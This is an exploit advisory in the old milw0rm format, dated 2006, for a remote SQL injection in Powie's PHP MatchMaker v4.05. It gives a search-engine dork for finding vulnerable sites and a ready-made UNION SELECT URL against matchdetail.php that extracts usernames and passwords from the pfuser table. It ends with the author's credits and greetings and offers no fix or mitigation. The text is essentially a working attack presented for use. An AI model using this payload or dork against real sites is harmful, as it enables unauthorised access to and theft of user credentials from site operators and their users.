#============================================================================================== #Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://www.powie.de # #Version : v4.05 # #=============================================================================================== # #DORK : "Powie's PSCRIPT MatchMaker 4.05" # # #Exploit : #-------------------------------- # #http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1 # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo # sPECial THanks to : CaMpA , Coder-AZH@CKTEAM ================================================================================================== # milw0rm.com [2006-11-17]